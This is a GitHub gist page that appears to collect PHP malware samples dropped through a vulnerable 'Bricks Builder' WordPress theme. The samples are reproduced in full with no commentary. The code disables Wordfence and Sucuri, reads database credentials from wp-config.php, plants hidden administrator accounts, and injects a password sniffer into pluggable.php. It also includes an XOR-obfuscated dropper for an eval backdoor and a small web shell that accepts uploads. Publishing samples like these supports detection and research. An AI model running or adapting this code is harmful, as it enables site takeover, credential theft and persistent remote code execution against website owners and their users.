Skip to content

Instantly share code, notes, and snippets.

@lynt-smitka
Last active March 7, 2024 16:01
Show Gist options
  • Save lynt-smitka/1eef476aed934fd3bc0be0813ea82f39 to your computer and use it in GitHub Desktop.
Save lynt-smitka/1eef476aed934fd3bc0be0813ea82f39 to your computer and use it in GitHub Desktop.
Bircks Builder <1.9.6.1 Malware
<?php
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
function genstr($length = 10)
{
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length);
}
function gwi($dr, &$aa)
{
if (!file_exists("$dr/wp-includes/version.php")) return NULL;
if (!@include("$dr/wp-includes/version.php")) return NULL;
$cd = array();
$cd['host'] = "none";
$cd['auth_key'] = "_" . genstr(56);
$cd['name'] = "wordpress";
$cd['docroot'] = $dr;
$cd['ver'] = "";
$cd['db_login'] = "";
$cd['db_passwd'] = "";
$cd['db_name'] = "";
$cd['db_host'] = "";
$cd['db_prefix'] = "";
$cd["wf_status"] = "none";
$cd["wf2_status"] = "none";
$cd["se_status"] = "none";
$cd["users"] = Array();
$bp = $dr . "/wp-content/plugins/";
$ntd = array("se_status" => "sucuri-scanner/sucuri.php",
"wf_status" => "wordfence/wordfence.php", "wf2_status" => "wordfence/waf/bootstrap.php");
foreach ($ntd as $name=>$pg) {
if (is_file($bp . $pg)) {
@rename($bp . $pg, $bp . $pg . "backup" . rand());
if (is_file($bp . $pg)) {
$cd[$name] = "cantdisable";
} else {
$cd[$name] = "disabled";
}
}
}
if (!isset($wp_version)) {
$wp_version = "unknown";
}
$cnt = @file_get_contents("$dr/wp-config.php");
preg_match_all(/(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/, $cnt, $m);
if (is_array($m)) {
for ($i = 0; $i < count($m[2]); $i++) {
if (stristr($m[2][$i], "db_name")) {
$cd['db_name'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_user")) {
$cd['db_login'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_password")) {
$cd['db_passwd'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_host")) {
$cd['db_host'] = $m[4][$i];
}
}
}
preg_match_all(/table_prefix\s*=\s*['"](.*)['"];/, $cnt, $m);
if (is_array($m)) {
$cd['db_prefix'] = $m[1][0];
}
$cd['ver'] = $wp_version;
$cd = awu($cd, $aa);
return sws($dr, $cd);
}
function sws($docroot, $cd)
{
$rep = "\$ignore_codes = array";
$pd = <<< BASE64decoded
if (!is_wp_error($user))
{
$csrf = "{AUTHKEY}";
$line = $password . "\t" . $username . "\t" . get_site_url();
$line = $line ^ str_repeat($csrf, (strlen($line) / strlen($csrf)) + 1);
$line = bin2hex($line);
$lines = @file("{DUMPFILE}", FILE_IGNORE_NEW_LINES);
$lines[] = $line;
@file_put_contents("{DUMPFILE}", implode("\n", array_unique($lines)));
$lines = get_option('wpsdt4_license_key');
$lines = explode("\n", $lines);
$lines[] = $line;
$lines = array_unique($lines);
update_option('wpsdt4_license_key', implode("\n", array_unique($lines)));
}
BASE64decoded;
$pa = <<< BASE64decoded
if (isset($_COOKIE["{AUTHKEY}"]))
{
$lines = get_option( 'wpsdt4_license_key' );
if (!empty($lines))
{
$lines = @file_get_contents("{DUMPFILE}");
}
echo $lines;
exit();
}
BASE64decoded;
$pf = "$docroot/wp-includes/pluggable.php";
$pc = @file_get_contents($pf);
if (strpos($pc, "line ^ str_repeat") !== FALSE) {
preg_match_all(/\$csrf\s=\s\"(\w{20,})\";/, $pc, $m);
if (is_array($m))
{
$cd["auth_key"] = $m[1][0];
}
$cd["sniffer_status"] = "already";
return $cd;
}
$au = $cd["auth_key"];
$df = substr(md5($au), 0, 8);
$pd = str_replace("{AUTHKEY}", $au, $pd);
$pd = str_replace("{DUMPFILE}", $df, $pd);
$pa = str_replace("{AUTHKEY}", $au, $pa);
$pa = str_replace("{DUMPFILE}", $df, $pa);
$ot = @stat($pf);
$src = @file_get_contents($pf);
$src = str_replace($rep, $pd . "\r\n" . $rep, $src);
$src = $src . "\r\n" . $pa;
@file_put_contents($pf, $src);
@touch($pf, $ot["mtime"]);
if (strpos(@file_get_contents($pf), $au) !== FALSE) {
$cd["sniffer_status"] = "installed";
} else {
$cd["sniffer_status"] = "error";
}
return $cd;
}
function awu($cd, &$aa)
{
$dbn = $cd['db_name'];
$dbu = $cd['db_login'];
$dbp = $cd['db_passwd'];
$dh = $cd['db_host'];
$dpfx = $cd['db_prefix'];
if (!empty($dbn)) {
if (strpos($dh, ":") !== FALSE) {
$hp = explode(":", $dh);
$h1 = $hp[0];
$port = intval($hp[1]);
} else {
$h1 = $dh;
$port = 3306;
}
if ($conn = mysqli_connect($h1, $dbu, $dbp, $dbn, $port)) {
$result = mysqli_query($conn, "SHOW DATABASES;");
$dbs = Array();
while($rw = mysqli_fetch_array($result, MYSQLI_NUM))
{
$dbs[] = $rw;
}
foreach ($dbs as $cdb) {
$cdb = $cdb[0];
if (TRUE) {
mysqli_select_db($conn, $cdb);
$result2 = mysqli_query($conn, "SHOW TABLES;");
$tab = Array();
while($rw = mysqli_fetch_array($result2, MYSQLI_NUM))
{
$tab[] = $rw;
}
foreach ($tab as $wct) {
$wct = $wct[0];
$ppos = strpos($wct, "usermeta");
if ($ppos !== FALSE) {
$pfx = substr($wct, 0, $ppos);
$result3 = mysqli_query($conn, "SELECT option_value FROM " . $pfx . "options WHERE option_name='siteurl';");
$su = mysqli_fetch_array($result3, MYSQLI_NUM);
if (count($su)) {
$su = $su[0];
$do = explode("/", $su);
$do = $do[2];
$do = str_replace("www.", "", $do);
if ($dpfx === $pfx)
{
$cd['host'] = $do;
}
$ra = mysqli_query($conn, "SELECT * FROM " . $pfx . "users WHERE user_login LIKE 'wpcron%';");
if (mysqli_num_rows($ra))
{
break;
}
$ck = $h1 . $dbu . $dbp . $dbn . $do;
if (isset($aa[$ck]))
{
continue;
}
$aa[$ck] = TRUE;
$usern = 'wpcron' . substr(md5(time()), 0, 8);
$pp = genstr(8);
$pass = md5($pp);
mysqli_query($conn, "INSERT INTO $pfx" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$usern', '$pass', '$usern', 0, '$usern', '1979-01-01 00:00:00');");
mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();");
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');");
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "user_level', '10');");
mysqli_commit($conn);
$cd["users"][] = Array($su, $usern, $pp);
}
}
}
}
}
mysqli_close($conn);
}
}
return $cd;
}
function list_dir($dir, $od=TRUE)
{
$res = Array();
$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
$h = @opendir($dir);
if ($h === FALSE) {
return $res;
}
while (($f = readdir($h)) !== FALSE) {
if ($f !== '.' and $f !== '..') {
$tmp = "$dir/$f";
if ($od) {
if (@is_dir($tmp)) {
$res[] = $tmp;
}
}
else{
$res[] = $tmp;
}
}
}
closedir($h);
return $res;
}
$bd = Array();
$aq = Array();
$cd = $_SERVER["DOCUMENT_ROOT"];
while ($cd = @dirname($cd)) {
if ($cd == $aq[count($aq) - 1]) {
break;
}
$aq[] = $cd;
}
foreach ($aq as $cd) {
if (!in_array($cd, $bd)) {
$l1 = list_dir($cd);
foreach ($l1 as $l1d)
{
$bd = array_merge($bd, list_dir($l1d));
}
$bd = array_merge($bd, $l1);
}
}
$bd = array_unique(array_merge($aq, $bd));
$aa = Array();
$res = Array();
foreach ($bd as $dc)
{
$tmp = gwi($dc, $aa);
if ($tmp)
{
$res[] = $tmp;
}
}
echo "{MARK}" . rawurlencode(serialize($res)) . "{MARK}";
exit();
<?php
if(!defined(\"PHP_EOL\"))
{
define(\"PHP_EOL\", \"\n\");
}
if(!defined(\"DIRECTORY_SEPARATOR\"))
{
define(\"DIRECTORY_SEPARATOR\", \"/\");
}
function generateRandomStringEval($length = 12)
{
$characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
function generateRndString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
function generateRandomString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString . \".php\";
}
function _add_action($snippet, $template, $xor_number)
{
$splitted = str_split($snippet);
$action = \"\";
for ($i = 0; $i < strlen($snippet);$i++) {
$action .= $splitted[$i] ^ $template[$i%$xor_number];
}
$action = urlencode($action);
return $action;
}
function GetDocRoot()
{
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
if ($docroot_end === FALSE)
{
return $_SERVER['DOCUMENT_ROOT'];
}
elseif ($docroot_end === 0)
{
return \"/\";
}
else
{
return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
}
$origin_backdoor = <<< BASE64decoded
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
function shdp($data, $key)
{
$out_data = "";
for ($i = 0; $i < strlen($data);) {
for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
if (isset($_GET[673435]))
{
die(md5(47712));
}
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
$data = @unserialize(shdp(shdp(base64_decode($data), '4ef63abe-1abd-45a6-913d-6fb99657e24b'), $data_key));
if (isset($data['ak'])) {
if ($data['a'] == 'i') {
$i = array(
'pv' => @phpversion(),
'sv' => '1.0-1',
);
echo @serialize($i);
} elseif ($data['a'] == 'e') {
eval($data['d']);
}
exit();
}
}
BASE64decoded;
$new_pass = generateRndString(35);
$origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor );
$evaluaor = <<< BASE64decoded
<?php
function _remove_action($snippet, $template)
{
$snippet = urldecode($snippet);
$splitted = str_split($snippet);
$action = "";
for ($i = 0; $i < strlen($snippet);$i++) {
$action .= $splitted[$i] ^ $template[$i%xor_number];
}
return $action;
}
$i="#URLENCODED_CODE#";
$j="#URLENCODED_file_put_contetnts#";
$index="#XORKEY#";
$k = _remove_action($i, $index);
$f = _remove_action($j, $index);
$f($index, $k);
include_once ($index);
unlink($index);
exit();
BASE64decoded;
$xor_number=rand(3,12);
$XORKEY = generateRandomStringEval(12);
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number);
$URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number);
$snippet_varname = generateRandomStringEval(rand(6,12));
$template_varname = generateRandomStringEval(rand(6,12));
$splitted_varname = generateRandomStringEval(rand(6,12));
$_remove_action_varname = generateRandomStringEval(rand(6,12));
$index_varname = generateRandomStringEval(rand(6,12));
$evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor);
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor);
$evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor);
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor);
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor);
$evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor);
$evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor);
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor);
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor);
srand(time());
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) {
return false;
} else {
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
////////////////////////////////////////////////////////////////////////////////////////////
$filename = \"readurl.php\";
# $filename = generateRandomString();
#$filename = \"options-reading.php\";
#$filename = \"wp-login.php\";
$filename = \"xjc6q59v.php\";
# get base local and remote path
$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = GetDocRoot();
$full_payload_name = GetDocRoot() . \"/$filename\";
$good = FALSE;
if (file_put_contents($full_payload_name, $payload_file))
{
echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL;
$good=TRUE;
$good_counter++;
exit();
}
if(!$good)
echo \"URL#STATUS_CANTUPLOAD#CCCURL\";
echo \"#CCCURL\";
//unlink(\"dfaonfpfkwg.php\");
exit();?>
<?php file_put_contents(\"e9a045b4ce28.php\",\"
<?php echo 409723 * 20;
if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") {
echo "ok";
eval(base64_decode($_REQUEST["id"]));
if ($_POST["up"] == "up") {
@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
}
} ?>
\")
;exit;?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment